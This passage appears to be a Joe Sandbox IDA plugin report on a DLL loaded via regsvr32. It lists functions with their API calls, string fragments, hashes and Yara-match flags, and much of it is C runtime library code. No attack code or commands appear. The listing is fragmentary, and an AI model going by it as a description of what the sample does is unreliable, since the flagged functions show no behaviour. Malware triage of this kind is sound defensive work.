Instruction Fuzzy Hash: 8761266AA08BA28BFB659F3694017B937A0AF44BC4F084136DE4D466F5DF7CE981C305

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF8CB7EB5CC Relevance: 12.7, APIs: 5, Strings: 2, Instructions: 407timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetTimeFormatA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF8CB7EB35C), ref: 00007FF8CB7EB6BC
GetTimeFormatA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF8CB7EB35C), ref: 00007FF8CB7EB751
free.LIBCMT ref: 00007FF8CB7EB78E
__ascii_stricmp.LIBCMT ref: 00007FF8CB7EB825

Strings

am/pm, xrefs: 00007FF8CB7EB81B
a/p, xrefs: 00007FF8CB7EB87D

Memory Dump Source

Source File: 00000002.00000002.367441695.00007FF8CB7A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CB7A0000, based on PE: true

Associated: 00000002.00000002.367431544.00007FF8CB7A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367517826.00007FF8CB7F2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367685034.00007FF8CB7F6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367739659.00007FF8CB7F9000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8cb7a0000_regsvr32.jbxd

Similarity

API ID: FormatTime$__ascii_stricmpfree
String ID: a/p$am/pm
API String ID: 2252689280-3206640213
Opcode ID: f0a1e010cfc2bba628f50de28a03b415369789bd89755694daa0cdadb7c0128b
Instruction ID: 18f024bc17231aa9561b75300f707610efac8d3e80f1f076fcedb96472394ee3
Opcode Fuzzy Hash: f0a1e010cfc2bba628f50de28a03b415369789bd89755694daa0cdadb7c0128b
Instruction Fuzzy Hash: 6AF1C12291CBE28BEB658EA695D017C6BA1FF047C4F449132EE8957BF5DE3DA844C301

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF8CB7E6F0C Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 137fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(?,?,?,?,?,00007FF8CB7E7194,?,?,?,?,00007FF8CB7E6C69,?,?,00000000,00007FF8CB7E30C0), ref: 00007FF8CB7E6FCF
GetStdHandle.KERNEL32(?,?,?,?,?,00007FF8CB7E7194,?,?,?,?,00007FF8CB7E6C69,?,?,00000000,00007FF8CB7E30C0), ref: 00007FF8CB7E70DB
WriteFile.KERNEL32 ref: 00007FF8CB7E7115

Strings

Runtime Error!Program: , xrefs: 00007FF8CB7E6F8E
Microsoft Visual C++ Runtime Library, xrefs: 00007FF8CB7E70BF
<program name unknown>, xrefs: 00007FF8CB7E6FD9
..., xrefs: 00007FF8CB7E7032

Memory Dump Source

Source File: 00000002.00000002.367441695.00007FF8CB7A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CB7A0000, based on PE: true

Associated: 00000002.00000002.367431544.00007FF8CB7A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367517826.00007FF8CB7F2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367685034.00007FF8CB7F6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367739659.00007FF8CB7F9000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8cb7a0000_regsvr32.jbxd

Similarity

API ID: File$HandleModuleNameWrite
String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
API String ID: 3784150691-4022980321
Opcode ID: a3f87b8c5f367064f797f5b9ceb23e0cb6ebb80f3dcd78d3f9f2145c33283283
Instruction ID: 02fc7e6a1c455b91b1f2729516c4fae1ab93e1b5c87b93724fb7d4257f696840
Opcode Fuzzy Hash: a3f87b8c5f367064f797f5b9ceb23e0cb6ebb80f3dcd78d3f9f2145c33283283
Instruction Fuzzy Hash: F351DA21B18FA747FB20DF67A9567BA2351AFA43D0F404136ED0D46AFACE3CE5068204

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF8CB7E20E0 Relevance: 12.1, APIs: 8, Instructions: 67COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlCaptureContext.KERNEL32 ref: 00007FF8CB7E23FB
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF8CB7E241A
RtlVirtualUnwind.KERNEL32 ref: 00007FF8CB7E2466
IsDebuggerPresent.KERNEL32 ref: 00007FF8CB7E24D8
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF8CB7E24F0
UnhandledExceptionFilter.KERNEL32 ref: 00007FF8CB7E24FD
GetCurrentProcess.KERNEL32 ref: 00007FF8CB7E2516
TerminateProcess.KERNEL32 ref: 00007FF8CB7E2524

Memory Dump Source

Source File: 00000002.00000002.367441695.00007FF8CB7A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CB7A0000, based on PE: true

Associated: 00000002.00000002.367431544.00007FF8CB7A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367517826.00007FF8CB7F2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367685034.00007FF8CB7F6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367739659.00007FF8CB7F9000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8cb7a0000_regsvr32.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerEntryFunctionLookupPresentTerminateUnwindVirtual
String ID:
API String ID: 3778485334-0
Opcode ID: 44244c45948aa76910f1429c67e23cf948153936c8457040e3babb9890c0c3d8
Instruction ID: 71ce176891a83a31faad526d9eaa6766493c7d3616da334d57ef7bea6980846c
Opcode Fuzzy Hash: 44244c45948aa76910f1429c67e23cf948153936c8457040e3babb9890c0c3d8
Instruction Fuzzy Hash: E131B135A08FAA86EA509F52F8447A973A4FF94784F500036EE8D427B5DF7CE059C708

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF8CB7EE6C0 Relevance: 10.8, APIs: 7, Instructions: 301COMMONLIBRARYCODE

Download Yara Rule

APIs

_lock.LIBCMT ref: 00007FF8CB7EE6EB

Part of subcall function 00007FF8CB7EE550: _errno.LIBCMT ref: 00007FF8CB7EE559

free.LIBCMT ref: 00007FF8CB7EE7E2

Part of subcall function 00007FF8CB7E3024: HeapFree.KERNEL32(?,?,00000000,00007FF8CB7E2DDC,?,?,?,00007FF8CB7E2DFF,?,?,?,00007FF8CB7E254F,?,?,?,00007FF8CB7E262A), ref: 00007FF8CB7E303A
Part of subcall function 00007FF8CB7E3024: _errno.LIBCMT ref: 00007FF8CB7E3044
Part of subcall function 00007FF8CB7E3024: GetLastError.KERNEL32(?,?,00000000,00007FF8CB7E2DDC,?,?,?,00007FF8CB7E2DFF,?,?,?,00007FF8CB7E254F,?,?,?,00007FF8CB7E262A), ref: 00007FF8CB7E304C

Part of subcall function 00007FF8CB7E7FBC: _errno.LIBCMT ref: 00007FF8CB7E7FD4

___lc_codepage_func.LIBCMT ref: 00007FF8CB7EE76B

Part of subcall function 00007FF8CB7E6550: RtlCaptureContext.KERNEL32 ref: 00007FF8CB7E658F
Part of subcall function 00007FF8CB7E6550: IsDebuggerPresent.KERNEL32 ref: 00007FF8CB7E662D
Part of subcall function 00007FF8CB7E6550: SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF8CB7E6637
Part of subcall function 00007FF8CB7E6550: UnhandledExceptionFilter.KERNEL32 ref: 00007FF8CB7E6642
Part of subcall function 00007FF8CB7E6550: GetCurrentProcess.KERNEL32 ref: 00007FF8CB7E6658
Part of subcall function 00007FF8CB7E6550: TerminateProcess.KERNEL32 ref: 00007FF8CB7E6666

Memory Dump Source

Source File: 00000002.00000002.367441695.00007FF8CB7A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CB7A0000, based on PE: true

Associated: 00000002.00000002.367431544.00007FF8CB7A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367517826.00007FF8CB7F2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367685034.00007FF8CB7F6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367739659.00007FF8CB7F9000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8cb7a0000_regsvr32.jbxd

Similarity

API ID: _errno$ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerErrorFreeHeapLastPresentTerminate___lc_codepage_func_lockfree
String ID:
API String ID: 178205154-0
Opcode ID: 74de64cbd29ae749c01db9c906a5c8058d145dff36747eda2fd1744b72fc25a1
Instruction ID: 0eb5944f1faad99721da8860a4d88d75c974d44686aff9302bf50323e214d278
Opcode Fuzzy Hash: 74de64cbd29ae749c01db9c906a5c8058d145dff36747eda2fd1744b72fc25a1
Instruction Fuzzy Hash: A0D18F22A0CBE28FE7A09F26944067A7B96BF857C0F404535DE8D676B6DF3CE8518701

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF8CB7EDF98 Relevance: 10.6, APIs: 7, Instructions: 136COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF8CB7EE1C2), ref: 00007FF8CB7EDFF2
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF8CB7EE1C2), ref: 00007FF8CB7EE004
GetLocaleInfoW.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF8CB7EE1C2), ref: 00007FF8CB7EE04F
GetLocaleInfoW.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF8CB7EE1C2), ref: 00007FF8CB7EE0E1
WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF8CB7EE1C2), ref: 00007FF8CB7EE11B
free.LIBCMT ref: 00007FF8CB7EE12F

Part of subcall function 00007FF8CB7E6C34: _FF_MSGBANNER.LIBCMT ref: 00007FF8CB7E6C64
Part of subcall function 00007FF8CB7E6C34: RtlAllocateHeap.NTDLL(?,?,00000000,00007FF8CB7E30C0,?,?,00000000,00007FF8CB7E6B19,?,?,00000000,00007FF8CB7E6BC3), ref: 00007FF8CB7E6C89
Part of subcall function 00007FF8CB7E6C34: _errno.LIBCMT ref: 00007FF8CB7E6CAD
Part of subcall function 00007FF8CB7E6C34: _errno.LIBCMT ref: 00007FF8CB7E6CB8

GetLocaleInfoA.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF8CB7EE1C2), ref: 00007FF8CB7EE145

Memory Dump Source

Source File: 00000002.00000002.367441695.00007FF8CB7A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CB7A0000, based on PE: true

Associated: 00000002.00000002.367431544.00007FF8CB7A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367517826.00007FF8CB7F2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367685034.00007FF8CB7F6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367739659.00007FF8CB7F9000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8cb7a0000_regsvr32.jbxd

Similarity

API ID: InfoLocale$_errno$AllocateByteCharErrorHeapLastMultiWidefree
String ID:
API String ID: 2309262205-0
Opcode ID: 71a04b091aa06e394b105ea5eb29500c7d2471e259f2c6ae1c50144f40b044a4
Instruction ID: 52b0293774efcaabdc8faae6a01fcab053470ee8038dce4d46bd1611636a5eee
Opcode Fuzzy Hash: 71a04b091aa06e394b105ea5eb29500c7d2471e259f2c6ae1c50144f40b044a4
Instruction Fuzzy Hash: 64517E32A08BA68BE7A09F2298405697792FF447E4F540935EE1E47BF4DF7DE9858300

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF8CB7EFCA0 Relevance: 9.1, APIs: 6, Instructions: 91COMMON

Download Yara Rule

APIs

_lock.LIBCMT ref: 00007FF8CB7EFCC3
_errno.LIBCMT ref: 00007FF8CB7EFCD5

Part of subcall function 00007FF8CB7E66D8: DecodePointer.KERNEL32 ref: 00007FF8CB7E66FF

_errno.LIBCMT ref: 00007FF8CB7EFD14

Memory Dump Source

Source File: 00000002.00000002.367441695.00007FF8CB7A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CB7A0000, based on PE: true

Associated: 00000002.00000002.367431544.00007FF8CB7A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367517826.00007FF8CB7F2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367685034.00007FF8CB7F6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367739659.00007FF8CB7F9000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8cb7a0000_regsvr32.jbxd

Similarity

API ID: _errno$DecodePointer_lock
String ID:
API String ID: 2175075375-0
Opcode ID: e83d4e1a308f3a4c606242a395cb5e969118d697d0d9f70e8103cd5b86654c3e
Instruction ID: 4b0391bf3157304eac41a2c9478ad76956ed507f10f3b99511f433953750b8c9
Opcode Fuzzy Hash: e83d4e1a308f3a4c606242a395cb5e969118d697d0d9f70e8103cd5b86654c3e
Instruction Fuzzy Hash: 16318222B18BE247FB15AE62946577A6691AF847C4F448434DF0D4BBBADF3CD8119700

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF8CB7E6550 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlCaptureContext.KERNEL32 ref: 00007FF8CB7E658F
IsDebuggerPresent.KERNEL32 ref: 00007FF8CB7E662D
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF8CB7E6637
UnhandledExceptionFilter.KERNEL32 ref: 00007FF8CB7E6642
GetCurrentProcess.KERNEL32 ref: 00007FF8CB7E6658
TerminateProcess.KERNEL32 ref: 00007FF8CB7E6666

Memory Dump Source

Source File: 00000002.00000002.367441695.00007FF8CB7A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CB7A0000, based on PE: true

Associated: 00000002.00000002.367431544.00007FF8CB7A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367517826.00007FF8CB7F2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367685034.00007FF8CB7F6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367739659.00007FF8CB7F9000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8cb7a0000_regsvr32.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerPresentTerminate
String ID:
API String ID: 1269745586-0
Opcode ID: 4b9ca92828b1b5c60ed307038ce46a3bf90eb6ca82a158dafa7f71ad6e682487
Instruction ID: d67a4ce1f66034b3fe85f82679351132d2f86263034afe8a030e2e99af587a7c
Opcode Fuzzy Hash: 4b9ca92828b1b5c60ed307038ce46a3bf90eb6ca82a158dafa7f71ad6e682487
Instruction Fuzzy Hash: D5312B32A08FD687EA248F56E4453AAB3A0FB89784F400135EA8D43A79DF3CD549CB04

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180022010 Relevance: 9.0, Strings: 7, Instructions: 235COMMON

Download Yara Rule

Strings

94, xrefs: 0000000180022371
1l7., xrefs: 00000001800220AF
]$d, xrefs: 00000001800220D6
]k, xrefs: 000000018002232E
M8;, xrefs: 0000000180022338
]k, xrefs: 0000000180022069
"+H, xrefs: 000000018002236A

Memory Dump Source

Source File: 00000002.00000002.367292109.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: "+H$1l7.$M8;$]$d$]k$]k$94
API String ID: 0-2447245168
Opcode ID: 3fd6bef9004380659c47559ba6e3d81fe5eea7f701e849f333ef0deba45e7d13
Instruction ID: 1221e244f5383d3e6569bf50eb566ee92e7d288cf12f4405919b94e37960c7a7
Opcode Fuzzy Hash: 3fd6bef9004380659c47559ba6e3d81fe5eea7f701e849f333ef0deba45e7d13
Instruction Fuzzy Hash: 3FB10D7160130CCBDBA9DF28C18A6DA3BE1FF48748F114129FD1A97261D774E919CB46

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF8CB7EC16C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 54COMMON

Download Yara Rule

APIs

GetLocaleInfoA.KERNEL32 ref: 00007FF8CB7EC1C7
GetLocaleInfoA.KERNEL32 ref: 00007FF8CB7EC209
GetACP.KERNEL32 ref: 00007FF8CB7EC22C

Strings

OCP, xrefs: 00007FF8CB7EC1A5
ACP, xrefs: 00007FF8CB7EC195

Memory Dump Source

Source File: 00000002.00000002.367441695.00007FF8CB7A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CB7A0000, based on PE: true

Associated: 00000002.00000002.367431544.00007FF8CB7A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367517826.00007FF8CB7F2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367685034.00007FF8CB7F6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367739659.00007FF8CB7F9000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8cb7a0000_regsvr32.jbxd

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: 388ed1ec509bc17a1b1080bf0c7b12a90c89964bfa9f21f0ca41505682e31820
Instruction ID: 5420f991740cd03df9a992bba23c46b965745cf603630e4dde68c5fc2be7b2c7
Opcode Fuzzy Hash: 388ed1ec509bc17a1b1080bf0c7b12a90c89964bfa9f21f0ca41505682e31820
Instruction Fuzzy Hash: 71214965A0CFA79BFA209F22E8402BA67A1AF447C8F444131EE4D476B5EE2CE655C704

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180003598 Relevance: 8.2, Strings: 6, Instructions: 720COMMON

Download Yara Rule

Strings

o, xrefs: 0000000180003CAE
I-, xrefs: 0000000180004227
li7, xrefs: 0000000180003802
QL&, xrefs: 0000000180003C57
1h, xrefs: 0000000180004545
IY, xrefs: 0000000180003ECF

Memory Dump Source

Source File: 00000002.00000002.367292109.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: 1h$I-$IY$QL&$li7$o
API String ID: 0-890095520
Opcode ID: d92cde7f9b8773e82faae5f21764c68a430e9ac7962d305d8d3ec3a014b69236
Instruction ID: 3309774e0679b3a301b7d0c809474a48ec240f33eb9a68417431e078f6a2137f
Opcode Fuzzy Hash: d92cde7f9b8773e82faae5f21764c68a430e9ac7962d305d8d3ec3a014b69236
Instruction Fuzzy Hash: 72921875604BC88BCBB8DF24DC85BDD7BE0FB86305F20561DD85E9AA60CBB85645CB02

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000AC48 Relevance: 8.0, Strings: 6, Instructions: 548COMMON

Download Yara Rule

Strings

Rku, xrefs: 000000018000B40E
{,, xrefs: 000000018000AD2C
i, xrefs: 000000018000B672
1, xrefs: 000000018000AD5C
", xrefs: 000000018000B539
$-%, xrefs: 000000018000B3AF

Memory Dump Source

Source File: 00000002.00000002.367292109.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: 1$ {,$"$$-%$Rku$ i
API String ID: 0-1845893065
Opcode ID: 8a8483899f0d6f446eebdfc8e7bf7c7542960c12dc616770c4deeefd42d211ba
Instruction ID: cb6ea2ed9b9de3b3effb5fe074f3157ffd1060f729125c5012da7c2884d2f589
Opcode Fuzzy Hash: 8a8483899f0d6f446eebdfc8e7bf7c7542960c12dc616770c4deeefd42d211ba
Instruction Fuzzy Hash: EB52D470544BCA8BCBB8CF24CC85BEF7BA0FB44306F155529D89A8A291DBB85749CF41

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180029B28 Relevance: 8.0, Strings: 6, Instructions: 535COMMON

Download Yara Rule

Strings

EX, xrefs: 000000018002A39C
OX, xrefs: 000000018002A0D4
VUS/, xrefs: 000000018002A254
@, xrefs: 0000000180029B80
YV~, xrefs: 000000018002A301
p, xrefs: 000000018002A15A

Memory Dump Source

Source File: 00000002.00000002.367292109.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: VUS/$YV~$p$@$EX$OX
API String ID: 0-2743166816
Opcode ID: 42abff069bb8dd677487b4024391c19b5d6520d96b7057ef658f077a6ca5f53c
Instruction ID: 6ceb6cba6b0314249f0ec67deadc173c496f62a90fe3cec01f017443767c42d8
Opcode Fuzzy Hash: 42abff069bb8dd677487b4024391c19b5d6520d96b7057ef658f077a6ca5f53c
Instruction Fuzzy Hash: BD3213711097848FD3A9CF68C58A65BBBF0FBCA744F104A1DF68687260C7B6D949CB42

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800059B8 Relevance: 7.9, Strings: 6, Instructions: 408COMMON

Download Yara Rule

Strings

ru, xrefs: 000000018000623C
R3T, xrefs: 0000000180005C59
d}9J, xrefs: 0000000180006179
t:v, xrefs: 0000000180005E76
-!zt, xrefs: 0000000180005BD7
Mv`b, xrefs: 0000000180005D4E

Memory Dump Source

Source File: 00000002.00000002.367292109.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: -!zt$Mv`b$R3T$d}9J$t:v$ru
API String ID: 0-2100131636
Opcode ID: e0551372703c1c57f1fc0d9d1de0f1be02ef62f192bed394747547d409ac2d0a
Instruction ID: abddbd47ac15f5a8ffacaf8e31a06efd054a3dbd2afb1a66e8bbaa14beb483a4
Opcode Fuzzy Hash: e0551372703c1c57f1fc0d9d1de0f1be02ef62f192bed394747547d409ac2d0a
Instruction Fuzzy Hash: C1221BB050478C8BDBB8CF64C9897DD7BB0FB44308F10862DDA5AAB250CBB45686CF59

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180013780 Relevance: 7.8, Strings: 6, Instructions: 323COMMON

Download Yara Rule

Strings

lbzZ, xrefs: 0000000180013863
$, xrefs: 0000000180013C6D
"`2, xrefs: 00000001800139CE
tro, xrefs: 00000001800139A0
kO, xrefs: 000000018001387E
lmq, xrefs: 0000000180013A6B

Memory Dump Source

Source File: 00000002.00000002.367292109.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: $$"`2$lbzZ$lmq$tro$kO
API String ID: 0-2401169580
Opcode ID: b22a75222821f6640e36d1476563fd6974371582067e8c17588d676730c46316
Instruction ID: 279b0f6eedbbacd77816cba7ac57bf6919de5fbe0bc464da326619847ce4fcd1
Opcode Fuzzy Hash: b22a75222821f6640e36d1476563fd6974371582067e8c17588d676730c46316
Instruction Fuzzy Hash: BBF1C3709047488FDBA8DFA8D9867DDBBB1FB48304F20821DD84AEB255DB749A49CF41

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF8CB7E4558 Relevance: 7.5, APIs: 5, Instructions: 39timethreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 00007FF8CB7E458F
GetCurrentProcessId.KERNEL32 ref: 00007FF8CB7E459A
GetCurrentThreadId.KERNEL32 ref: 00007FF8CB7E45A6
GetTickCount.KERNEL32 ref: 00007FF8CB7E45B2
QueryPerformanceCounter.KERNEL32 ref: 00007FF8CB7E45C3

Memory Dump Source

Source File: 00000002.00000002.367441695.00007FF8CB7A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CB7A0000, based on PE: true

Associated: 00000002.00000002.367431544.00007FF8CB7A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367517826.00007FF8CB7F2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367685034.00007FF8CB7F6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367739659.00007FF8CB7F9000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8cb7a0000_regsvr32.jbxd

Similarity

API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
String ID:
API String ID: 1445889803-0
Opcode ID: 223c3edd6aa26ef4227c63ba9b3a174b47cd905fe72dc54f34602d1df15ca246
Instruction ID: 91443826b84daba4e0c32ac6d346a2a6d2ab6b23858f28347f4b3c73c6a27b8f
Opcode Fuzzy Hash: 223c3edd6aa26ef4227c63ba9b3a174b47cd905fe72dc54f34602d1df15ca246
Instruction Fuzzy Hash: EA01A931A29F1A83EB409F22F8406693360FB49BD0F546230EE5E477B4CE3CD8968308

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000FC48 Relevance: 6.7, Strings: 5, Instructions: 447COMMON

Download Yara Rule

Strings

PT, xrefs: 000000018001038A
2f, xrefs: 000000018001051C
)#?, xrefs: 0000000180010418
UbA, xrefs: 00000001800103C4
EX., xrefs: 000000018001032D

Memory Dump Source

Source File: 00000002.00000002.367292109.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: )#?$EX.$PT$UbA$2f
API String ID: 0-1318892062
Opcode ID: f9a85fa51538b1a6c0e22373df85dddbbc427f24166f886711afb0f01761c199
Instruction ID: a9b5704be98d3dd027f678fe08c59eda011257bdda9cf4ed25ea0f7660729633
Opcode Fuzzy Hash: f9a85fa51538b1a6c0e22373df85dddbbc427f24166f886711afb0f01761c199
Instruction Fuzzy Hash: 8B320DB190078C8BDBB8CF64C8856DD7BF0FB48318F50852DEA1A9B251DBB45685CF98

Uniqueness

Uniqueness Score: -1.00%

Function 000000018001FC0C Relevance: 6.6, Strings: 5, Instructions: 400COMMON

Download Yara Rule

Strings

tZp, xrefs: 000000018001FFAF
qjf, xrefs: 000000018001FD57
QP|m, xrefs: 000000018001FCBC
3061002, xrefs: 000000018001FF09, 000000018001FF3F
?F, xrefs: 0000000180020023

Memory Dump Source

Source File: 00000002.00000002.367292109.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: 3061002$?F$QP|m$qjf$tZp
API String ID: 0-1546586143
Opcode ID: 5b73a1a625f2cfc86355e0bd41939d36f11956a340da434ded1f42b2c003968d
Instruction ID: e54beaa769b94aae3cb673a52a2b60ade73482c6e5d3d936cdc9b6ae13d51efd
Opcode Fuzzy Hash: 5b73a1a625f2cfc86355e0bd41939d36f11956a340da434ded1f42b2c003968d
Instruction Fuzzy Hash: 0B122870A0470CDFCF69DFA8C08A6DDBBF2FB44344F1091A9E816AB261D7759A19CB41

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180016D3C Relevance: 6.6, Strings: 5, Instructions: 379COMMON

Download Yara Rule

Strings

JQ, xrefs: 0000000180016D72
x\J, xrefs: 00000001800171C3
k&(, xrefs: 0000000180017125
v, xrefs: 00000001800170BE
t, xrefs: 0000000180017275

Memory Dump Source

Source File: 00000002.00000002.367292109.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: JQ$k&($t$v$x\J
API String ID: 0-1134872184
Opcode ID: bdc050f96bf44494249bd4848307985b7cf3b13daba02c673abc667a99b0703a
Instruction ID: 7c1fd17b310acde7e359d6be57bcfb6c2dd011f2caef592e77d3cba241376f6b
Opcode Fuzzy Hash: bdc050f96bf44494249bd4848307985b7cf3b13daba02c673abc667a99b0703a
Instruction Fuzzy Hash: F312E0B0504709EFCB99DF28C18AADE7BF0FB48308F40812AF80A9B254D774DA58DB45

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000703C Relevance: 6.3, Strings: 5, Instructions: 87COMMON

Download Yara Rule

Strings

?rIc, xrefs: 000000018000710E
R, xrefs: 00000001800070D3
V, xrefs: 0000000180007053
)H8, xrefs: 000000018000709E
L==, xrefs: 0000000180007159

Memory Dump Source

